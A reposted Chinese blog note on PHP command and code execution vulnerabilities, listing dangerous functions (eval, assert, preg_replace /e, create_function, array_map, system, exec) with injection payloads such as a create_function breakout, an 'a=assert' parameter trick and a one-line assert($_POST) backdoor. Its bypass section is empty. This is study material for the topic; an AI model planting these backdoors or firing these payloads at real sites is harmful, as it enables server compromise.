命令执行tips

最新推荐文章于 2024-07-12 15:51:39 发布
最新推荐文章于 2024-07-12 15:51:39 发布
阅读量102 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/sylover/p/10850690.html
版权

介绍:

命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

 

代码执行

${}执行代码
eval
assert
preg_replace
create_function()
call_user_func()/call_user_func_array()
array_filter()

方法:

${phpinfo()};
eval('echo hsy;');
//url?x=phpinfo()
<?php assert($_POST['x']); ?>

preg_replace()

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

tips

 

$b = preg_replace("/abc/e",$b,'abcd');

 

create_function()

函数create_function主要用来创建匿名函数

string create_function ( string $args , string $code )

例子:

<?php
$x= create_function('$x','echo $x+1;');
$x(1);
?>
output:2

当我在构造匿名函数第二个参数的位置放置我想执行的语句时,这个语句就会成立。

$a = 'phpinfo()';
$b = create_function(" ",$a);
$b();
?>

借鉴了网上的一个例子:

<?php

$id = $_GET['id'];

$code = 'echo $name.'.'的编号是'.$id.';';

$b = create_function('$name',$code);
function ss($name){
    echo $name ."编号".$id;
}
$b('sd');

?>

构造payload:

?id=2;}phpinfo();/*

传入后代码执行结果:

function ss($name){
    echo $name ."编号".2;
}phpinfo();/*
}
$b('sd');

array_map()

array array_map ( callable $callback , array $array1 [, array $... ] )
array_map():返回数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。

array_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。

不难理解哈,就是第一个参数作为自定义的函数,后一个参数作为数组下标。

<?php
$a = $_GET['a'];

$b = $_GET['b'];

$array[0] = $b;

$c = array_map($a,$array);

?>
//?a=assert&b=phpinfo();

 

命令执行

    system()

    passthru()

    exec()

    shell_exec()

    `反引号

    ob_start()

    mail函数+LD_PRELOAD执行系统命令

    system()
  • system

  • passthru()

 

  • exec()

  • shell_exec()

  • `反引号

 

敏感字符绕过

 

转载于:https://www.cnblogs.com/sylover/p/10850690.html

Surenon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vimtips:Vim提示
02-04
- 学习使用Vim的命令模式进行多行操作,如 `:1,10d` 删除第1至第10行。 - 使用Vim的折叠功能 (`zf`, `zd`, `zo`) 管理代码结构。 通过不断实践和学习,Vim的“vimtips”将使你成为编辑器的高手,大大提高你的文本...
git-tips:这里是我的笔记,记录一些git常用和一些记不住的命令
02-03
如果你想要将一个已存在的项目添加到Git仓库,可以先进入项目目录,然后运行此命令。 2. **添加文件到暂存区**: `git add <file>`用于将单个文件添加到暂存区,`git add .`则会添加所有未被跟踪的新文件和修改过...
Tips】——实用的linux命令
汤庆
05-25 795
一、ls命令 -l:列出长数据串,包含文件的属性与权限数据等 -a:列出全部的文件,连同隐藏文件(开头为.的文件)一起列出来(常用) -d:仅列出目录本身,而不是列出目录的文件数据 -h:将文件容量以较易读的方式(GB,kB等)列出来 -R:连同子目录的内容一起列出(递归列出),等于该目录下的所有文件都会显示出来 ls -lh //列出所在目录下的所有文件...
Linux 常用命令 Tips
时不我待
07-23 1257
1.wget用-O参数可以指定下载文件的名字,-c参数可以继续上次未完成的任务。 2.
eregi函数漏洞
qq_54929891的博客
04-18 674
<?php if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r');//eregi搜索字符串,$b的第一个字符和111拼接后检查1114从是否.
layer弹出层框架alert与msg详解
欲寄彩笺兼尺素,山高水阔知何处
09-18 4万+
layer至今仍作为layui的代表作,她的受众广泛并非偶然,而是这五年多的坚持,不断完善和维护、不断建设和提升社区服务,使得猿们纷纷自发传播,乃至于成为今天的Layui最强劲的源动力。目前,layer已成为国内最多人使用的web弹层组件,GitHub自然Stars3000+,官网累计下载量达30w+,大概有20万Web平台正在使用layer。  键: 值 描述
layer弹出层的关闭问题——在执行完毕后关闭当前弹出层
热门推荐
Mencre的博客
07-31 4万+
今天再用layui写东西的时候遇到一个问题,就是在弹出层操作完之后不知道怎么在弹出层内操作关闭这个弹出层,查阅资料之后终于找到了解决的办法。下面两段出自官网文档。 一、layer.close(index) - 关闭特定层 关于它似乎没有太多介绍的必要,唯一让你疑惑的,可能就是这个index了吧。事实上它非常容易得到。 //当你想关闭当前页的某个层时 var index = layer.op...
Metasploit技巧命令支持tips
大学霸__IT达人
05-02 220
Metasploit技巧命令支持tips 在Metasploit 5.0.80版本中,新增加了技巧命令tips,可以用来显示一些有用的技巧。大学霸IT达人如果想要查看所有的技巧列表,则执行命令为tip -l。在Metasploit 5.0.86版本中,支持使用tips命令。例如,查看技巧列表,则执行命令tips -l。 ...
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1784
php命令执行基础与CTF例题分析
neo4j启动命令的小tips
qq_38569853的博客
07-27 3164
neo4j启动命令console与start的区别
vim tips: 执行外部命令
zkreats的博客
09-23 6573
简介: vim 是十分强大的文本编辑工具,但有一些事它做不了。本文简单说说在不离开 vim 编辑器的情况下,执行 shell 命令、工具。 1. 进入 shell (1)在 vim 中执行 :shell 或 :sh,当退出当前 shell 时,就会回到 vim; (2)也可以使用 ctr-z 进入 shell, 然后执行 fg 回到 vim。 上述功能可用于下述场景: 如我们
VirtualMachine Tips
08-01
在安装过程中可能会遇到包冲突,需要删除冲突的`runc`包,然后重新执行安装命令。启动Docker并检查版本以验证安装成功。 在遇到软件包依赖问题时,如本文中提到的`runc`和`containerd.io`冲突,可以按照提示进行...
100-gdb-tips
05-05
3. **运行与单步执行** - `run`: 开始执行程序。 - `next`: 执行下一行,跳过函数调用。 - `step`: 进入函数调用。 4. **查看变量** - `print variable`: 查看变量值。 - `display variable`: 每次暂停时自动...
tips:命令行和编程技巧与窍门
04-18
在Linux环境下,命令行提供了一种强大的交互方式,通过简洁的命令可以执行各种任务。例如,`ls`用于列出目录内容,`cd`用于切换目录,`mkdir`和`rm`则分别用于创建和删除目录。学会使用`grep`和`find`能帮助你在大量...
PHP编程开发工具有哪些?
Pythonit教程网
07-10 1009
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1822
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 980
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 236
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。
java版的上门家政系统和PHP版的上门家政有什么区别?
最新发布
baina666的博客
07-12 491
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
tips数据集在哪里下载
06-02
Seaborn库自带了一些数据集,其中包括tips数据集。我们可以使用Seaborn库中的load_dataset函数来加载tips数据集。 如果你还没有安装Seaborn库,可以在...运行上述代码,就可以将tips数据集加载到tips变量中进行使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值